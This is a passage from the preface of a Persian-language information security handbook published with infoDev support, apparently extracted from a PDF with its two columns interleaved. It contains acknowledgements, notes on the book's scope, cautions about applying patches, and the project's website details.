‫ﺭﺩﻩ ﺧﺎﺭﺝ ﻭ ﻗﺪﻳﻤﻲ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ‬ ‫ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺘﺎﺏ ﮔﺎﻫﻲ ﻣـﻲﺗـﻮﺍﻥ ﻣﻄﺎﻟـﺐ‬
‫ﻛﺘــﺎﺏ ﺗﻤــﺎﻣﻲ ﺑﺨــﺸﻬﺎﻱ ﺁﻥ ﺩﺭ ﻳــﻚ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﺑــﻪ ﺁﺩﺭﺱ‬ ‫ﻣﺸﺘﺮﻙ ﻭ ﺗﻜﺮﺍﺭﻱ ﭘﻴـﺪﺍ ﻛـﺮﺩ‪ ،‬ﭼﺮﺍﻛـﻪ ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫‪ www.infodev-security.net‬ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ ﺗﺎ ﻫﺮﻳﻚ ﺭﺍ‬ ‫ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﺑﺨـﺸﻲ ﺍﺯ ﻛﺘـﺎﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ‬
‫ﺑﺘﻮﺍﻥ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﻮﺩ‪ .‬ﺧﻮﺍﻧﻨـﺪﮔﺎﻧﻲ ﻛـﻪ ﻣﺎﻳـﻞ ﺑـﻪ‬ ‫ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﻛﺎﺭ ﺁﻧﻬﺎ ﻣﻲﺁﻳﺪ‪ .‬ﺑﻌﻀﻲ ﺑﺨﺸﻬﺎ ‪ -‬ﺧـﺼﻮﺻﹰﺎ‬
‫ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻣﻄﺎﻟﺐ ﻣﻔﻴﺪ ﺩﺭ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺑﺎﺷـﻨﺪ‬ ‫ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺗﺸﺮﻳﺢ ﺍﻣﻨﻴﺖ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ ‪-‬‬
‫ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘﻴــﺸﻨﻬﺎﺩﺍﺕ ﺧــﻮﺩ ﺭﺍ ﺑــﻪ ﺁﺩﺭﺱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‬ ‫ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻞ ﻣﻨﺘﺸﺮ ﻭ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ ﺑـﻪ ﺁﻧﻬـﺎ‬
‫‪ contact@infodev-security.net‬ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻮﺯﻳﻊ ﻧﻤﻮﺩ‪.‬‬

‫ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺪﻭﻥ ﺣﻤﺎﻳﺖ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺍﻓـﺮﺍﺩ ﻭ ﻣﺆﺳـﺴﺎﺕ‬ ‫ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﺎﭼﺎﺭ ﺑﻪ ﺍﻳﺠﺎﺩ ﺗﻮﺍﺯﻥ ﻣﻴﺎﻥ ﺍﺻـﻮﻝ‬
‫ﻭﻳــﮋﻩ ﻭ ﻣﻬــﻢ ﻫﻴﭽﮕــﺎﻩ ﻣﻤﻜــﻦ ﻧﺒــﻮﺩ‪ ،‬ﺍﺯ ﺟﻤﻠــﻪ ﺳﻴﻤــﺴﻮﻥ‬ ‫ﻛﻠﻲ‪ ،‬ﻧﻤﻮﻧﻪﻫﺎﻱ ﻭﻳﮋﻩ‪ ،‬ﻭ ﺍﻃﻼﻋﺎﺕ ﻋﻤﻠﻲ ﺑﻮﺩﻩﺍﻳﻢ ﻭ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ‬
‫ﮔﺎﺭﻓﻴﻨﻜﻞ‪ ،١٣‬ﻛﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﻣﻬﻤﻲ ﺩﺭ ﺗﺪﻭﻳﻦ ﺳـﺎﺧﺘﺎﺭ ﺍﻭﻟﻴـﺔ‬ ‫ﻛﻪ ﺗﻮﺍﺯﻥ ﺍﻳﺠﺎﺩﺷﺪﻩ ﺍﺯ ﺗﻨﺎﺳﺐ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮﭼـﻪ ﺑـﺎ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻤﻮﺩ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺩﺭ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻫﻤﺎﻫﻨـﮓﺳـﺎﺯﻱ‬ ‫ﭘﻴﺸﺮﻓﺖ ﻭ ﺗﻜﺎﻣﻞ ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺟﺰﺋﻴﺎﺕ ﻓﻨﻲ ﻧﻴﺰ ﺗﻐﻴﻴﺮ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪،‬‬
‫ﻗﺴﻤﺘﻲ ﺍﺯ ﺗﻴﻢ ﺗﻬﻴﻪﻛﻨﻨﺪﮔﺎﻥ ﻛﺘﺎﺏ ﻛﻤـﻚ ﻛـﺮﺩ‪ .‬ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ‬ ‫ﺍﻣﺎ ﺍﻳﻦ ﺍﺻﻮﻝ ﻫﻤﻮﺍﺭﻩ ﺛﺎﺑﺖ ﺧﻮﺍﻫﻨﺪ ﺑـﻮﺩ ﻭ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﺍﺯ ﻧﻈـﺮ‬
‫ﺳﻴﺎﺳﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﺁﺳـﺎﻥ‬
‫ﺁﻧﻬﺎ ﻣـﻲﺑﺎﺷـﻨﺪ‪ .‬ﺍﮔـﺮ ﺍﻳـﻦ ﺍﺻـﻮﻝ ﺑـﺪﻗﺖ ﺩﺭﻙ ﺷـﻮﻧﺪ ﺁﻧﮕـﺎﻩ‬
‫‪12‬‬ ‫‪Cyber-Security‬‬ ‫ﺭﺍﻩﺣﻠﻬﺎﻱ ﻓﻨﻲ ﺑﺴﺎﺩﮔﻲ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﮔﺮﻓﺖ‪.‬‬
‫‪13‬‬ ‫‪Simson Garfinkel‬‬
‫‪١٧‬‬ ‫ﭘﻴﺶﺩﺭﺁﻣﺪ‬

‫ﻋﻤﻠﻴﺎﺗﻲ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‪ ٢٦‬ﻧﻴﺰ ﺗﺸﻜﺮ ﻧﻤﺎﻳﻴﻢ‪ .‬ﻧﻮﺷﺘﻪ ﻫـﺎﻱ ﻭﻱ ﺩﺭ‬ ‫ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﺪﻭﻥ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻭ ﻛﻤﻚ ﺍﻭ ﻣﻴﺴﺮ ﻧﻤﻲﺷﺪ‪ .‬ﺑﺮﻭﻧـﻮ‬
‫ﻣﻮﺭﺩ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪ ،٢٧‬ﺗﻬﺪﻳـﺪﺍﺕ ﭼﻨـﺪﻭﺟﻬﻲ‪ ٢٨‬ﻭ‬ ‫ﻟﻨﻮﻳﻦ‪ ،١٤‬ﻣﺪﻳﺮ ‪ infoDev‬ﻛﻪ ﺍﻋﺘﺒـﺎﺭﺍﺕ ﺯﻳـﺎﺩﻱ ﺑـﺮﺍﻱ ﺗﻔﻬـﻴﻢ‬
‫ﻣﺪﻳﺮﻳﺖ ﺧﻄﺮ ﺳﻴﺎﺭ‪ ٢٩‬ﺩﺭ ﺑﺨﺶ ﺳﻮﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﻣﻨﺎﺳﺒﺖ ﻭ ﻗﺪﺭﺕ ﺧﻠﻖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﺯﻳﻊ ﺁﻥ ﺩﺭ ﺯﻣﻴﻨﺔ ﻓﻨـﺎﻭﺭﻱ‬
‫ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬ ‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩ؛ ﻫﻤﭽﻨﻴﻦ ﮊﺍﻛﻠﻴﻦ ﺩﻭﺑـﻮ‪،١٥‬‬
‫ﺍﻟﻲ ﺍﻟﻮﻱ‪ ،١٦‬ﺗﺮﻱ ﻧﺎﻛﺎﺯﻝ‪ ١٧‬ﻭ ﻫﺮﻳﺮﻱ ﺑﺮﺗـﺎﺩﻭ‪ ١٨‬ﻛـﻪ ﻫﻤﮕـﻲ ﺍﺯ‬
‫ﻣﺎﻛﺲ ﺍﺷﻨﻠﻤﻦ‪ ٣٠‬ﻧﻤﺎﻳﻨﺪﺓ ﺳﻮﺋﻴﺲ ﺩﺭ ﻛﻤﻴﺘﺔ ﺗﻮﺳﻌﺔ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺪﻳﺮﺍﻥ ‪ infoDev‬ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﺗـﻴﻢ ﺍﻭﺭﻳﻠـﻲ ﻛـﻪ ﺑـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺩﺭ ﺍﺟﻼﺱ ﭼﺎﻧﮓ ﻛـﻴﻦ‪ ٣١‬ﭼـﻴﻦ ﺩﺭ ﺳـﺎﻝ ‪ ۲۰۰۲‬ﻧﻴـﺰ ﻳﻜـﻲ ﺍﺯ‬
‫ﺷﺮﻛﺖ ﺧﻮﺩ ﺑﻪ ﻧﺎﻡ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ‪ ١٩‬ﺩﻭ ﻛﺘـﺎﺏ ﺯﻳـﺮ ﺭﺍ ﻣﻨﺘـﺸﺮ‬
‫ﺍﻭﻟﻴﻦ ﻛﺴﺎﻧﻲ ﺑﻮﺩ ﻛﻪ ﺍﻫﻤﻴﺖ ﻭ ﻓﺎﻳﺪﺓ ﺩﺳﺘﻨﺎﻣﺔ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬
‫ﻛﺮﺩﻧﺪ ﻧﻴﺰ ﺗﺸﻜﺮ ﻣﻲﻛﻨﻴﻢ‪ :‬ﺍﻣﻨﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﻛﺎﺭﺑﺮﺩ ﻳﻮﻧﻴﻜﺲ‪،٢٠‬‬
‫ﺍﻃﻼﻋــﺎﺕ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ ﺭﺍ ﺗــﺸﺨﻴﺺ ﺩﺍﺩ ﻭ‬
‫ﻭﻳﺮﺍﻳﺶ ﺳﻮﻡ )ﺳﻴﻤﺴﻮﻥ ﮔﺎﺭﻓﻴﻨﻜـﻞ‪ ،‬ﮊﻥ ﺍﺳـﭙﺎﻓﻮﺭﺩ‪ ٢١‬ﻭ ﺁﻟـﻦ ﺷـﻮﺍﺭﺗﺰ‪،٢٢‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻴﻬﺎ ﻭ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﻭ ﺑﻮﺩ ﻛﻪ ﺑﻪ ﺣﻤﺎﻳﺖ ﺩﻭﻟﺖ ﺳﻮﺋﻴﺲ ﺍﺯ‬ ‫‪٢٣‬‬
‫ﭼﺎﭖ ‪ (۲۰۰۳‬ﻭ ﺍﻣﻨﻴـﺖ ﻭﺏ‪ ،‬ﻣﺤﺮﻣـﺎﻧﮕﻲ ﻭ ﺗﺠـﺎﺭﺕ )ﺳﻴﻤـﺴﻮﻥ‬
‫‪ infoDev‬ﺑﺮﺍﻱ ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻧﺠﺎﻣﻴﺪ ﻭ ﻣﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﻳـﻦ‬
‫ﮔﺎﺭﻓﻴﻨﻜﻞ ﻭ ﮊﻥ ﺍﺳﭙﺎﻓﻮﺭﺩ‪ ،‬ﭼﺎﭖ ‪ .(۲۰۰۲‬ﺍﻳـﻦ ﻛﺘﺎﺑﻬـﺎ ﺑـﺮﺍﻱ ﺗﻜﻤﻴـﻞ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭﻱ ﺭﺍ ﻣﻮﺭﺩ ﺗﻘﺪﻳﺮ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ‪.‬‬
‫ﺑﺨﺸﻬﺎﻱ ﻣﻬﻤـﻲ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺭﺍﻫﻨﻤـﺎ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻣﺎﻳﻜﻞ ﻣﻜﻠـﻲ‪ ٣٢‬ﻧﻴـﺰ ﮔﺮﻭﻫـﻲ ﺍﺯ ﻣﺘﺨﺼـﺼﻴﻦ ﻓﻌـﺎﻝ ﺭﺍ ﺑـﺮﺍﻱ‬ ‫ﮔﺮﻓﺘﻪﺍﻧﺪ ﻭ ﭼﻨﺪ ﺑﺨﺶ ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎ ﻛﺴﺐ ﻣﺠﻮﺯ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭ‬
‫ﺗﺪﻭﻳﻦ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﺸﻜﻴﻞ ﺩﺍﺩ ﻭ ﻫﻤﻴﻦ ﺍﻓﺮﺍﺩ ﺑﻮﺩﻧـﺪ ﻛـﻪ‬ ‫ﻧﺎﺷﺮﺍﻥ ﺑﺮﺍﻱ ﭼﺎﭖ ﻣﺠﺪﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺩﻗـﺖ ﻭ ﺗﻨﺎﺳـﺐ ﻧـﺴﺨﺔ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺷﺮﻛﺖ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ﺩﺭ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴـﺮ ﺩﻫﻬـﺎ‬
‫ﻧﻬﺎﻳﻲ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻧﺪ؛ ﻭ ﻣـﺎ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻳﻴﻬـﺎﻱ‬
‫ﺳﺎﺯﻧﺪﺓ ﺍﻳﺸﺎﻥ ﺗﺸﻜﺮ ﻣـﻲﻛﻨـﻴﻢ؛ ﻭ ﻫﻤﭽﻨـﻴﻦ ﻣﺮﺍﺗـﺐ ﺗـﺸﻜﺮ ﻭ‬ ‫ﻫﺰﺍﺭ ﻋﻨﻮﺍﻥ ﺍﺯ ﻛﺘﺎﺑﻬﺎﻱ ﻓﻨﻲ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣﺮﺩﻡ ﻛﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﻛﻪ ﻭﺿﻌﻴﺖ ﻛﺘﺎﺑﻬﺎ ﻭ‬
‫ﺍﻣﺘﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻤﺎﻣﻲ ﺩﺳﺖﺍﻧﺪﻛﺎﺭﺍﻥ ﻭ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑـﻪ ﺭﻭﻧـﺪ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﺩﺭ ﺟﻬـﺎﻥ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺭﺍ‬
‫ﭼﺎﭖ ﺍﻳﻦ ﻛﺘﺎﺏ ﻛﻤﻚ ﻛﺮﺩﻧﺪ ﺍﻋﻼﻡ ﻣﻲﻧﻤﺎﻳﻴﻢ‪.‬‬
‫ﺩﻳﺪﻩﺍﻧﺪ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﻣﺸﺎﺭﻛﺖ ﺍﻭﺭﻟﻲ ﺩﺭ ﺳﻴﺮ ﺗﻮﺍﻧﻤﻨـﺪﻱ ﻋﻠﻤـﻲ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻪ ﻣﺮﺟﻌﻲ ﺁﻣﻮﺯﺷـﻲ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ‬ ‫ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺟﻬﺖ ﺁﺷﻨﺎﻳﻲ‪ ،‬ﭘﺨﺶ ﻭ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ‬
‫‪ Windows ،Unix‬ﻳــﺎ ‪ Macintosh‬ﺍﺳــﺖ ﻭ ﻧــﻪ ﻣﺮﺟﻌــﻲ‬ ‫ﻟﺬﺍ ﻛﺎﻫﺶ ﺷﻜﺎﻑ ﺩﻳﺠﻴﺘﺎﻟﻲ ﭼﻘﺪﺭ ﻣﺆﺛﺮ ﻭ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺑـﻮﺩﻩ‬
‫ﺑﺮﺍﻱ ﺁﻣﻮﺯﺵ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻢ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺩﺭ ﻛﻨـﺎﺭ ﺭﺍﻫﻨﻤﺎﻫـﺎﻱ‬ ‫ﺍﺳﺖ‪.‬‬
‫ﺭﺍﻫﺒﺮﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺑﺮ ﺧﻮﺩ ﻻﺯﻡ ﻣﻲﺩﺍﻧﻴﻢ ﺍﺯ ﮔﺮﺩﺁﻭﺭﻧﺪﮔﺎﻥ ﻛﺘﺎﺑﻬﺎﻱ ﻓﻮﻕﺍﻟﺬﻛﺮ ﺑﺮﺍﻱ‬
‫ﻣﺪﻳﺮﻳﺖ ﺗﻐﻴﻴﺮﺍﺕ ﻭﺳﻴﻊ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﻛﻤــﻚ ﺷﺎﻳــﺴﺘﻪ ﻭ ﻣــﺸﺘﺎﻗﺎﻧﻪ ﺟﻬــﺖ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟــﺐ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﻛﻨﺪ‪ ،‬ﺣﺘﻲ ﺍﮔـﺮ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮﺍﺕ‬ ‫ﻛﺘﺎﺑﻬﺎﻳﺸﺎﻥ ﺩﺭ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﻪ ﮔﺮﻣﻲ ﺗـﺸﻜﺮ‬
‫ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺭﺍﺣﺘﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ‬ ‫ﻛﻨﻴﻢ‪ .‬ﺷﻮﺭ ﻭ ﺍﺷﺘﻴﺎﻕ ﺁﻧﺎﻥ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑـﻪ ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫ﺑﻪ ﻣﻨﺎﺑﻊ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺴﻴﺎﺭﻱ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻩﺍﻳﻢ‪ ،‬ﻭﻟﻲ ﺍﮔﺮ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ‬ ‫ﺭﺍﻫﻨﻤﺎ ﺑﻬﺘﺮﻳﻦ ﻧﻤﻮﻧﺔ ﻫﻤﻜﺎﺭﻱ ﺗﺨﺼﺼﻲ ﻭ ﺑﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ‬
‫ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻭ ﻭﺻﻠﻪﻫﺎﻱ‪ ٣٣‬ﭘﻴﺸﻨﻬﺎﺩﻱ ﻣﻮﺟﻮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﻲ ﺍﻣﺮﻭﺯ ﺍﺳﺖ‪.‬‬
‫ﻦ ﺍﻳﻨﺘﺮﻧﺘ ﹺ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺗﻤﺪﻥ ﻧﻮﻳ ﹺ‬
‫ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺟﺎﻧﺐ ﺍﺣﺘﻴﺎﻁ ﺭﺍ ﺭﻋﺎﻳﺖ ﻛﻨﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ‬
‫ﺑﻌﺪ ﺍﺯ ﺍﻳﺠـﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﻫـﺴﺘﻪ‪ ،٣٤‬ﻣﻌﻤـﺎﺭﻱ ﻭ ﻳـﺎ ﺩﺳـﺘﻮﺭﺍﺕ‬ ‫ﺩﺭ ﺍﻳﻨﺠﺎ ﻻﺯﻡ ﻣـﻲﺩﺍﻧـﻴﻢ ﺍﺯ ﺗـﺎﻡ ﻛﻠـﺮﻣﻦ‪ ،٢٤‬ﻣﺘﺨـﺼﺺ ﺍﺭﺷـﺪ‬
‫ﻲ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﺢ ﻛﻼﻥ ﺑﺴﺎﺩﮔﻲ‬ ‫ﻲ ﺗﺄﺛﻴﺮﺍﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺍﺭﺯﻳﺎﺑ ﹺ‬ ‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺓ ﺩﺍﺩﻩﻫﺎ‪ ٢٥‬ﺩﺭ ﺗﻴﻢ ﺍﻣﻨﻴﺖ ﺧﺰﺍﻧﺔ ﺑﺨﺶ ﺳﻴﺎﺳﺖ‬

‫‪25‬‬ ‫‪Senior Data Risk Management Specialist‬‬ ‫‪14‬‬ ‫‪Bruno Lanvin‬‬


‫‪26‬‬ ‫‪Integrator Group and Treasury Security Team‬‬ ‫‪15‬‬ ‫‪Jacquelin Dubow‬‬
‫‪of the Operations Policy Department‬‬ ‫‪16‬‬ ‫‪Ellie Alavi‬‬
‫‪27‬‬ ‫‪E-Finance‬‬ ‫‪17‬‬ ‫‪Teri Nachazel‬‬
‫‪28‬‬ ‫‪Blended Threats‬‬ ‫‪18‬‬ ‫‪Heriri Bretadeau‬‬
‫‪29‬‬ ‫‪Mobile Risk Management‬‬ ‫‪19‬‬ ‫‪O’Reilly & Associates‬‬
‫‪rd‬‬
‫‪30‬‬ ‫‪Max Schnellmann‬‬ ‫‪20‬‬ ‫‪Practical Unix and Internet Security 3 Edition‬‬
‫‪31‬‬ ‫‪Chongqing‬‬ ‫‪21‬‬ ‫‪Gene Spafford‬‬
‫‪32‬‬ ‫‪Michel Maechley‬‬ ‫‪22‬‬ ‫‪Alan Schwartz‬‬
‫‪33‬‬ ‫‪Patches‬‬ ‫‪23‬‬ ‫‪Web Security, Privacy & Commerce‬‬
‫‪34‬‬ ‫‪Kernel‬‬ ‫‪24‬‬ ‫‪Tom Kellermann‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٨‬‬

‫ﻣﻴﺴﺮ ﻧﺒﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺭﺍﻩﺣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﺮﻭﺷﻨﺪﻩﻫـﺎﻱ ﻣﺨﺘﻠـﻒ‬


‫ﺑﻄﻮﺭ ﻋـﺎﺩﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻳـﺎ ﻧـﺼﺐ ﺷـﻮﻧﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬
‫ﺩﺭﺍﺯﻣﺪﺕ ﺳﻄﺢ ﻛﻠـﻲ ﺍﻣﻨﻴـﺖ ﺗـﻀﻌﻴﻒ ﮔـﺮﺩﺩ؛ ﭘـﺲ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺳﺎﺯﮔﺎﺭﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺳﻴﺴﺘﻢ ﻭ ﻛﻴﻔﻴﺖ ﻭ ﺍﺷﺘﻬﺎﺭ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺧﺪﻣﺎﺕ ﻓﻨﻲ ﻭ ﻣﺸﺎﻭﺭﻩﺍﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﻧﻴﺰ ﺗﻮﺟﻪ ﻛﺮﺩ‪.‬‬
‫ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﻛﺘﺎﺏ ﺣﺎﺿﺮ ﺩﺭﻙ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺁﺳـﺎﻥﺗـﺮ‬
‫ﻛﻨﺪ ﻭ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﻢ ﻛـﻪ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﻧﻴـﺰ ﺑـﻪ ﺑﻬﺒـﻮﺩ ﻛﻴﻔـﻲ‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﻤﻚ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ‪.‬‬
